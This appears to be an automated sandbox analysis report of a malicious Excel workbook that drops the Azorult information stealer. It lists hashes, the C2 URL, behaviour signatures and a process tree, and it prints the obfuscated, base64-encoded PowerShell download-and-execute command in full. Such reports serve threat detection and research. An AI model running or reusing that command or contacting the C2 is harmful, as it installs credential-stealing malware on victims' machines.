Analysis

  • max time kernel
    121s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    22-07-2021 09:42

General

  • Target

    MUN_2207.xlsb

  • Size

    38KB

  • MD5

    302b089cdad737572251ed036c828168

  • SHA1

    a22de587007bf85f3998b4cdde2e794409ea0c0b

  • SHA256

    b4f58a5e9cc1c3b94f848aeb3830e9e28a38ec98cc6ec3337661d7b17c08e358

  • SHA512

    d52c79b2040d4028a31ca83304a23650e095c5efda67c6e3f0039d0b5bf9c9120825f4d4e89cad2290f582f6f294de3dfd003a0a91ec3eb6b85610dbfceedf25

Malware Config

Extracted

Family

azorult

C2

http://itthonfiatalon.hu/temp/reo/index.php

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Downloads MZ/PE file
  • Suspicious use of SetThreadContext 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\MUN_2207.xlsb
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:484
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C P^oW^eR^S^hE^Ll -E WwBzAHkAcwB0AEUAbQAuAFQAZQB4AFQALgBlAG4AYwBvAGQAaQBuAEcAXQA6ADoAdQBOAEkAYwBvAGQARQAuAGcAZQB0AHMAdABSAGkAbgBnACgAWwBzAHkAUwBUAEUATQAuAEMAbwBOAFYAZQByAFQAXQA6ADoAZgBSAG8AbQBCAEEAcwBFADYANABzAHQAcgBJAG4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAFUAQQBNAEEAQQB3AEEARABBAEEATwB3AEEAZwBBAEMAUQBBAGEAUQBBAHIAQQBDAHMAQQBLAFEAQQBnAEEASABzAEEASgBBAEIAcABBAEMAdwBBAEkAZwBCAGcAQQBHADQAQQBJAGcAQgA5AEEASAAwAEEAWQB3AEIAaABBAEgAUQBBAFkAdwBCAG8AQQBIAHMAQQBmAFEAQQBnAEEARwBZAEEAZABRAEIAdQBBAEcATQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEASABNAEEAYwBBAEIAeABBAEgAUQBBAEkAQQBBAG8AQQBDAEEAQQBKAEEAQgBtAEEASABvAEEAYwBnAEIAMABBAEMAQQBBAEwAQQBBAGcAQQBDAFEAQQBaAFEAQgAzAEEARwBrAEEAYQBBAEEAZwBBAEMAawBBAEkAQQBCADcAQQBFAGsAQQBiAFEAQgBRAEEARQA4AEEAVQBnAEIAMABBAEMAMABBAFQAUQBCAFAAQQBFAFEAQQBkAFEAQgBNAEEARwBVAEEASQBBAEIAaQBBAEcAawBBAGQAQQBCAFQAQQBIAFEAQQBjAGcAQgBoAEEARQA0AEEAYwB3AEIARwBBAEUAVQBBAFUAZwBBADcAQQBBADAAQQBDAGcAQgBUAEEASABRAEEAWQBRAEIAUwBBAEgAUQBBAEwAUQBCAGkAQQBFAGsAQQBkAEEAQgB6AEEASABRAEEAVQBnAEIAQgBBAEUANABBAFUAdwBCAG0AQQBFAFUAQQBjAGcAQQBnAEEAQwAwAEEAVQB3AEIAUABBAEYAVQBBAGMAZwBCAEQAQQBFAFUAQQBJAEEAQQBrAEEARwBZAEEAZQBnAEIAeQBBAEgAUQBBAEkAQQBBAHQAQQBFAFEAQQBSAFEAQgBUAEEARgBRAEEAUwBRAEIAdQBBAEUARQBBAFYAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEAQwBRAEEAWgBRAEIAMwBBAEcAawBBAGEAQQBBADcAQQBDAEEAQQBTAFEAQgB1AEEASABZAEEAYgB3AEIAcgBBAEcAVQBBAEwAUQBCAEoAQQBIAFEAQQBaAFEAQgB0AEEAQwBBAEEASgBBAEIAbABBAEgAYwBBAGEAUQBCAG8AQQBEAHMAQQBmAFEAQQBOAEEAQQBvAEEAZABBAEIAeQBBAEgAawBBAGUAdwBBAGcAQQBDAEEAQQBKAEEAQgB4AEEARwBvAEEAYgBBAEIAcABBAEgAZwBBAGQAQQBCAHAAQQBHAEkAQQBjAHcAQQA5AEEAQwBRAEEAWgBRAEIATwBBAEgAWQBBAE8AZwBCAFUAQQBFAFUAQQBUAFEAQgBRAEEAQwBzAEEASgB3AEIAYwBBAEcAcwBBAGIAQQBCAHcAQQBHAFkAQQBhAGcAQgBuAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBBADAAQQBDAGcAQgB6AEEASABBAEEAYwBRAEIAMABBAEMAQQBBAEoAdwBCAG8AQQBIAFEAQQBkAEEAQgB3AEEARABvAEEATAB3AEEAdgBBAEcATQBBAFkAUQBCAHoAQQBHAFUAQQBaAGcAQgB5AEEARwBFAEEAYgBnAEIAcgBBAEMANABBAFkAdwBCAHYAQQBHADAAQQBMAHcAQgAwAEEARwBVAEEAYgBRAEIAdwBBAEMAOABBAFoAUQBCAG4AQQBHAFEAQQBaAHcAQgBvAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBAGcAQQBDAFEAQQBjAFEAQgBxAEEARwB3AEEAYQBRAEIANABBAEgAUQBBAGEAUQBCAGkAQQBIAE0AQQBPAHcAQQBOAEEAQQBvAEEASQBBAEIAOQBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEAIgApACkAfABpAEUAeAA=
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1748
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        PoWeRShELl -E WwBzAHkAcwB0AEUAbQAuAFQAZQB4AFQALgBlAG4AYwBvAGQAaQBuAEcAXQA6ADoAdQBOAEkAYwBvAGQARQAuAGcAZQB0AHMAdABSAGkAbgBnACgAWwBzAHkAUwBUAEUATQAuAEMAbwBOAFYAZQByAFQAXQA6ADoAZgBSAG8AbQBCAEEAcwBFADYANABzAHQAcgBJAG4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAFUAQQBNAEEAQQB3AEEARABBAEEATwB3AEEAZwBBAEMAUQBBAGEAUQBBAHIAQQBDAHMAQQBLAFEAQQBnAEEASABzAEEASgBBAEIAcABBAEMAdwBBAEkAZwBCAGcAQQBHADQAQQBJAGcAQgA5AEEASAAwAEEAWQB3AEIAaABBAEgAUQBBAFkAdwBCAG8AQQBIAHMAQQBmAFEAQQBnAEEARwBZAEEAZABRAEIAdQBBAEcATQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEASABNAEEAYwBBAEIAeABBAEgAUQBBAEkAQQBBAG8AQQBDAEEAQQBKAEEAQgBtAEEASABvAEEAYwBnAEIAMABBAEMAQQBBAEwAQQBBAGcAQQBDAFEAQQBaAFEAQgAzAEEARwBrAEEAYQBBAEEAZwBBAEMAawBBAEkAQQBCADcAQQBFAGsAQQBiAFEAQgBRAEEARQA4AEEAVQBnAEIAMABBAEMAMABBAFQAUQBCAFAAQQBFAFEAQQBkAFEAQgBNAEEARwBVAEEASQBBAEIAaQBBAEcAawBBAGQAQQBCAFQAQQBIAFEAQQBjAGcAQgBoAEEARQA0AEEAYwB3AEIARwBBAEUAVQBBAFUAZwBBADcAQQBBADAAQQBDAGcAQgBUAEEASABRAEEAWQBRAEIAUwBBAEgAUQBBAEwAUQBCAGkAQQBFAGsAQQBkAEEAQgB6AEEASABRAEEAVQBnAEIAQgBBAEUANABBAFUAdwBCAG0AQQBFAFUAQQBjAGcAQQBnAEEAQwAwAEEAVQB3AEIAUABBAEYAVQBBAGMAZwBCAEQAQQBFAFUAQQBJAEEAQQBrAEEARwBZAEEAZQBnAEIAeQBBAEgAUQBBAEkAQQBBAHQAQQBFAFEAQQBSAFEAQgBUAEEARgBRAEEAUwBRAEIAdQBBAEUARQBBAFYAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEAQwBRAEEAWgBRAEIAMwBBAEcAawBBAGEAQQBBADcAQQBDAEEAQQBTAFEAQgB1AEEASABZAEEAYgB3AEIAcgBBAEcAVQBBAEwAUQBCAEoAQQBIAFEAQQBaAFEAQgB0AEEAQwBBAEEASgBBAEIAbABBAEgAYwBBAGEAUQBCAG8AQQBEAHMAQQBmAFEAQQBOAEEAQQBvAEEAZABBAEIAeQBBAEgAawBBAGUAdwBBAGcAQQBDAEEAQQBKAEEAQgB4AEEARwBvAEEAYgBBAEIAcABBAEgAZwBBAGQAQQBCAHAAQQBHAEkAQQBjAHcAQQA5AEEAQwBRAEEAWgBRAEIATwBBAEgAWQBBAE8AZwBCAFUAQQBFAFUAQQBUAFEAQgBRAEEAQwBzAEEASgB3AEIAYwBBAEcAcwBBAGIAQQBCAHcAQQBHAFkAQQBhAGcAQgBuAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBBADAAQQBDAGcAQgB6AEEASABBAEEAYwBRAEIAMABBAEMAQQBBAEoAdwBCAG8AQQBIAFEAQQBkAEEAQgB3AEEARABvAEEATAB3AEEAdgBBAEcATQBBAFkAUQBCAHoAQQBHAFUAQQBaAGcAQgB5AEEARwBFAEEAYgBnAEIAcgBBAEMANABBAFkAdwBCAHYAQQBHADAAQQBMAHcAQgAwAEEARwBVAEEAYgBRAEIAdwBBAEMAOABBAFoAUQBCAG4AQQBHAFEAQQBaAHcAQgBvAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBAGcAQQBDAFEAQQBjAFEAQgBxAEEARwB3AEEAYQBRAEIANABBAEgAUQBBAGEAUQBCAGkAQQBIAE0AQQBPAHcAQQBOAEEAQQBvAEEASQBBAEIAOQBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEAIgApACkAfABpAEUAeAA=
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1864
        • C:\Users\Admin\AppData\Local\Temp\klpfjg.exe
          "C:\Users\Admin\AppData\Local\Temp\klpfjg.exe"
          4⤵
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:676
          • C:\Users\Admin\AppData\Local\Temp\klpfjg.exe
            "C:\Users\Admin\AppData\Local\Temp\klpfjg.exe"
            5⤵
              PID:1520

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/484-61-0x0000000071521000-0x0000000071523000-memory.dmp
      Filesize

      8KB

    • memory/484-62-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/484-103-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/484-60-0x000000002F171000-0x000000002F174000-memory.dmp
      Filesize

      12KB

    • memory/676-97-0x0000000005C90000-0x0000000005CF8000-memory.dmp
      Filesize

      416KB

    • memory/676-93-0x0000000000B00000-0x0000000000B01000-memory.dmp
      Filesize

      4KB

    • memory/676-95-0x00000000042B0000-0x00000000042B1000-memory.dmp
      Filesize

      4KB

    • memory/676-92-0x0000000000000000-mapping.dmp
    • memory/676-96-0x0000000000570000-0x000000000058B000-memory.dmp
      Filesize

      108KB

    • memory/676-98-0x0000000000A30000-0x0000000000A52000-memory.dmp
      Filesize

      136KB

    • memory/1520-100-0x000000000041A1F8-mapping.dmp
    • memory/1520-99-0x0000000000400000-0x0000000000420000-memory.dmp
      Filesize

      128KB

    • memory/1520-102-0x0000000000400000-0x0000000000420000-memory.dmp
      Filesize

      128KB

    • memory/1748-63-0x0000000000000000-mapping.dmp
    • memory/1864-67-0x0000000004850000-0x0000000004851000-memory.dmp
      Filesize

      4KB

    • memory/1864-74-0x0000000005640000-0x0000000005641000-memory.dmp
      Filesize

      4KB

    • memory/1864-88-0x0000000006250000-0x0000000006251000-memory.dmp
      Filesize

      4KB

    • memory/1864-89-0x00000000062D0000-0x00000000062D1000-memory.dmp
      Filesize

      4KB

    • memory/1864-90-0x0000000001D10000-0x0000000001D11000-memory.dmp
      Filesize

      4KB

    • memory/1864-80-0x000000007EF30000-0x000000007EF31000-memory.dmp
      Filesize

      4KB

    • memory/1864-79-0x0000000006090000-0x0000000006091000-memory.dmp
      Filesize

      4KB

    • memory/1864-81-0x0000000006180000-0x0000000006181000-memory.dmp
      Filesize

      4KB

    • memory/1864-71-0x0000000005240000-0x0000000005241000-memory.dmp
      Filesize

      4KB

    • memory/1864-70-0x0000000004812000-0x0000000004813000-memory.dmp
      Filesize

      4KB

    • memory/1864-69-0x0000000004810000-0x0000000004811000-memory.dmp
      Filesize

      4KB

    • memory/1864-68-0x0000000002600000-0x0000000002601000-memory.dmp
      Filesize

      4KB

    • memory/1864-66-0x00000000024B0000-0x00000000024B1000-memory.dmp
      Filesize

      4KB

    • memory/1864-65-0x0000000075FE1000-0x0000000075FE3000-memory.dmp
      Filesize

      8KB

    • memory/1864-64-0x0000000000000000-mapping.dmp